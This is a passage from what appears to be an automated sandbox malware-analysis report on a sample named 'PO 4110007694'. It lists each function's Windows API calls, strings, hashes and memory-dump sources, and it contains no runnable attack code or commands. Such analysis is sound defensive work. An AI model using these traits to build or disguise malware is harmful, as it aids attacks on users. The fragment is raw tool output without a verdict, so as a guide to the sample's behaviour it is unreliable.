                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C9755E
                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00C97565
                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C97578
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00C97580
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C9758B
                                                                    • DeleteDC.GDI32(00000000), ref: 00C97594
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00C9759E
                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00C975B2
                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00C975BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                    • String ID: static
                                                                    • API String ID: 2559357485-2160076837
                                                                    • Opcode ID: 62a89cedb5f36695f89bcac6bd6aaed9b59f734202fce06b23bc89367c338710
                                                                    • Instruction ID: dc14745a7dddd301b5834db2ea5fd10c4d3492422d18e9daf2b1e6ac919f5397
                                                                    • Opcode Fuzzy Hash: 62a89cedb5f36695f89bcac6bd6aaed9b59f734202fce06b23bc89367c338710
                                                                    • Instruction Fuzzy Hash: 54314972115215ABDF129F64DC0DFDA3B69EF09320F16422AFA25D60A0C731D922DBA4
                                                                    Function 00C36E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C36E3E
                                                                      • Part of subcall function 00C38B28: __getptd_noexit.LIBCMT ref: 00C38B28
                                                                    • __gmtime64_s.LIBCMT ref: 00C36ED7
                                                                    • __gmtime64_s.LIBCMT ref: 00C36F0D
                                                                    • __gmtime64_s.LIBCMT ref: 00C36F2A
                                                                    • __allrem.LIBCMT ref: 00C36F80
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C36F9C
                                                                    • __allrem.LIBCMT ref: 00C36FB3
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C36FD1
                                                                    • __allrem.LIBCMT ref: 00C36FE8
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C37006
                                                                    • __invoke_watson.LIBCMT ref: 00C37077
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                    • String ID:
                                                                    • API String ID: 384356119-0
                                                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                    • Instruction ID: 39d58285309a8225afa1539621e628fc408ee6ae77fd11c2fb0ef0128713b281
                                                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                    • Instruction Fuzzy Hash: DE7117B6A10717BBD728EF68DC81B5AB7B8BF04324F148229F524D7281E770DE049B90
                                                                    Function 00C72527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C72542
                                                                    • GetMenuItemInfoW.USER32(00CD5890,000000FF,00000000,00000030), ref: 00C725A3
                                                                    • SetMenuItemInfoW.USER32(00CD5890,00000004,00000000,00000030), ref: 00C725D9
                                                                    • Sleep.KERNEL32(000001F4), ref: 00C725EB
                                                                    • GetMenuItemCount.USER32(?), ref: 00C7262F
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00C7264B
                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00C72675
                                                                    • GetMenuItemID.USER32(?,?), ref: 00C726BA
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C72700
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C72714
                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C72735
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                    • String ID:
                                                                    • API String ID: 4176008265-0
                                                                    • Opcode ID: 47beee526d3ac0ed6a0513287b34231cc4d0829dca291e3945811f5c63b833b7
                                                                    • Instruction ID: ffd3ce9ddfb44e63c29987fca832b21150604a1e332b86dbe0d8493da0be9eef
                                                                    • Opcode Fuzzy Hash: 47beee526d3ac0ed6a0513287b34231cc4d0829dca291e3945811f5c63b833b7
                                                                    • Instruction Fuzzy Hash: 8061BF70900249AFDF25CF64DD88EBEBBB8FB05304F14805AF865A3251D731AE46EB20
                                                                    Function 00C96F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C96FA5
                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C96FA8
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00C96FCC
                                                                    • _memset.LIBCMT ref: 00C96FDD
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C96FEF
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C97067
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow_memset
                                                                    • String ID:
                                                                    • API String ID: 830647256-0
                                                                    • Opcode ID: 45d5fc8fae6c617b55fc5253d04ce0636e12956d12d89454b8b309a38e2e5baf
                                                                    • Instruction ID: 405f1b5d1f7a464833edfea3e48507653b656475ffa52ff7a75a2c5201292ebc
                                                                    • Opcode Fuzzy Hash: 45d5fc8fae6c617b55fc5253d04ce0636e12956d12d89454b8b309a38e2e5baf
                                                                    • Instruction Fuzzy Hash: 22615A75900208AFDB11DFA4CC85FEE77B8EB09710F14419AFA15AB2A1C771AE45DB90
                                                                    Function 00C66B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C66BBF
                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00C66C18
                                                                    • VariantInit.OLEAUT32(?), ref: 00C66C2A
                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C66C4A
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00C66C9D
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C66CB1
                                                                    • VariantClear.OLEAUT32(?), ref: 00C66CC6
                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00C66CD3
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C66CDC
                                                                    • VariantClear.OLEAUT32(?), ref: 00C66CEE
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C66CF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                    • String ID:
                                                                    • API String ID: 2706829360-0
                                                                    • Opcode ID: 69d63e23818040fab0f79401b62b3c953e5cfd533f42eba68dd90f6fc2fd3f7c
                                                                    • Instruction ID: 6719e8a3cf979ddbcc031151d6057daf3f4377c2eb6b7983b676beb900744bc0
                                                                    • Opcode Fuzzy Hash: 69d63e23818040fab0f79401b62b3c953e5cfd533f42eba68dd90f6fc2fd3f7c
                                                                    • Instruction Fuzzy Hash: 36414475A00119AFCF10DF65D888AEEBBB9EF48354F008069E955E7261CB30EA46DF90
                                                                    Function 00C883BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                    • CoInitialize.OLE32 ref: 00C88403
                                                                    • CoUninitialize.OLE32 ref: 00C8840E
                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00CA2BEC,?), ref: 00C8846E
                                                                    • IIDFromString.OLE32(?,?), ref: 00C884E1
                                                                    • VariantInit.OLEAUT32(?), ref: 00C8857B
                                                                    • VariantClear.OLEAUT32(?), ref: 00C885DC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                    • API String ID: 834269672-1287834457
                                                                    • Opcode ID: 2fe89682371840b3fc8ca1e3839829c6d8e755a4c2bf9b2e53152684ae57b391
                                                                    • Instruction ID: 0327b81276999b9a79c8ecd8848670e6f74af6ebab5751058ed433c3b972f514
                                                                    • Opcode Fuzzy Hash: 2fe89682371840b3fc8ca1e3839829c6d8e755a4c2bf9b2e53152684ae57b391
                                                                    • Instruction Fuzzy Hash: E061BD716083129FD710EF14C858F6EB7E8AF86718F40481DF9829B691CB70EE48DB96
                                                                    Function 00C85732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00C85793
                                                                    • inet_addr.WSOCK32(?,?,?), ref: 00C857D8
                                                                    • gethostbyname.WSOCK32(?), ref: 00C857E4
                                                                    • IcmpCreateFile.IPHLPAPI ref: 00C857F2
                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C85862
                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C85878
                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C858ED
                                                                    • WSACleanup.WSOCK32 ref: 00C858F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                    • String ID: Ping
                                                                    • API String ID: 1028309954-2246546115
                                                                    • Opcode ID: a9e35f50c85941bac84ec24a4c0828fb6e27a6e068cdc6233c94e9f321fdf252
                                                                    • Instruction ID: 1eed7e33e6dc99007f84f3ad88ee55f717e54cb4ba4a1d9f3b3db12cfe071cab
                                                                    • Opcode Fuzzy Hash: a9e35f50c85941bac84ec24a4c0828fb6e27a6e068cdc6233c94e9f321fdf252
                                                                    • Instruction Fuzzy Hash: 3D51BE31644600DFDB20EF25CC89B6A77E4EF49314F04852AF966DB2E1DB70E941EB46
                                                                    Function 00C7B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00C7B4D0
                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C7B546
                                                                    • GetLastError.KERNEL32 ref: 00C7B550
                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00C7B5BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                    • API String ID: 4194297153-14809454
                                                                    • Opcode ID: d83555a324181f6c3b670a4186ecf5a6526e7e6bcb3e3d052a18b33f50cdc18f
                                                                    • Instruction ID: f7f77f8eea6d9cc993c67964a98505a5c80b130b44ca8819d0a2c712fd44a18f
                                                                    • Opcode Fuzzy Hash: d83555a324181f6c3b670a4186ecf5a6526e7e6bcb3e3d052a18b33f50cdc18f
                                                                    • Instruction Fuzzy Hash: E6318135A00205DFCB40EBA8C895FAEBBB4FF45310F10816AE519D7291DB719E46DB91
                                                                    Function 00C68F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                      • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C69014
                                                                    • GetDlgCtrlID.USER32 ref: 00C6901F
                                                                    • GetParent.USER32 ref: 00C6903B
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C6903E
                                                                    • GetDlgCtrlID.USER32(?), ref: 00C69047
                                                                    • GetParent.USER32(?), ref: 00C69063
                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C69066
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 1536045017-1403004172
                                                                    • Opcode ID: b4dd0a8db9f05c48fb1f48d4e4d2775ccffd38ef4210aad9d8c7099498641087
                                                                    • Instruction ID: a723bea567cae1e7177270bf36170ef9495c8e6ca444af4dda73f34c13240e32
                                                                    • Opcode Fuzzy Hash: b4dd0a8db9f05c48fb1f48d4e4d2775ccffd38ef4210aad9d8c7099498641087
                                                                    • Instruction Fuzzy Hash: 1621B674A00208BFDF15ABA0CC89FFEBB79EF49310F10025AF961972E1DB755955EA20
                                                                    Function 00C6907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                      • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C690FD
                                                                    • GetDlgCtrlID.USER32 ref: 00C69108
                                                                    • GetParent.USER32 ref: 00C69124
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C69127
                                                                    • GetDlgCtrlID.USER32(?), ref: 00C69130
                                                                    • GetParent.USER32(?), ref: 00C6914C
                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C6914F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 1536045017-1403004172
                                                                    • Opcode ID: 9b3b513228e159c794940348f3ab7852dafee22fe972cf65739c3b6d96c5e54c
                                                                    • Instruction ID: 7349c9ace7cff4a8d706922f9c5dee65790b4076194d58b5eb80cdb557d80dd8
                                                                    • Opcode Fuzzy Hash: 9b3b513228e159c794940348f3ab7852dafee22fe972cf65739c3b6d96c5e54c
                                                                    • Instruction Fuzzy Hash: 8521C875A00208BBDF11ABA5CC89FFEBB78EF49300F10415AF521972A1DB755556EB20
                                                                    Function 00C69163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32 ref: 00C6916F
                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00C69184
                                                                    • _wcscmp.LIBCMT ref: 00C69196
                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C69211
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                    • API String ID: 1704125052-3381328864
                                                                    • Opcode ID: b169b09ff87918efefaddd0ad91588fbe114b670acc415dd18088aa42a60eab1
                                                                    • Instruction ID: 73b12cbba52fb3ab19d472d695b414008908de2ac0db1d43ce343dbd53e08c40
                                                                    • Opcode Fuzzy Hash: b169b09ff87918efefaddd0ad91588fbe114b670acc415dd18088aa42a60eab1
                                                                    • Instruction Fuzzy Hash: 6F11EC36248307B9FE312665DC5BEAB379CDB15720F20013AF910E54E1FE7159516954
                                                                    Function 00C888AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00C888D7
                                                                    • CoInitialize.OLE32(00000000), ref: 00C88904
                                                                    • CoUninitialize.OLE32 ref: 00C8890E
                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00C88A0E
                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C88B3B
                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00CA2C0C), ref: 00C88B6F
                                                                    • CoGetObject.OLE32(?,00000000,00CA2C0C,?), ref: 00C88B92
                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00C88BA5
                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C88C25
                                                                    • VariantClear.OLEAUT32(?), ref: 00C88C35
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                    • String ID:
                                                                    • API String ID: 2395222682-0
                                                                    • Opcode ID: 2a19107a1dcb6e46e2e1d0b1e7d344acad2b2bea2fec13092e462c24bc965721
                                                                    • Instruction ID: 1da7ee4d0acd39b0a50785f9b618226117ce093f0d112deda5a96c74e1984f00
                                                                    • Opcode Fuzzy Hash: 2a19107a1dcb6e46e2e1d0b1e7d344acad2b2bea2fec13092e462c24bc965721
                                                                    • Instruction Fuzzy Hash: 06C135B1208305AFD700EF64C88496AB7E9FF89348F40492DF58ADB251DB71ED4ACB56
                                                                    Function 00C77990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00C77A6C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafeVartype
                                                                    • String ID:
                                                                    • API String ID: 1725837607-0
                                                                    • Opcode ID: 32f2615bb4cd09673d143504392d7427cb0766938bafa860ec90f5d1db823ca7
                                                                    • Instruction ID: f0eab3af07f990f92ca3e222c12c52230230730bd28e72252d209fd2bcd38c5d
                                                                    • Opcode Fuzzy Hash: 32f2615bb4cd09673d143504392d7427cb0766938bafa860ec90f5d1db823ca7
                                                                    • Instruction Fuzzy Hash: A4B19C7190421E9FDB01DFA4C885BBEB7B8FF09321F208529E619E7251D734E941DB91
                                                                    Function 00C711CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00C711F0
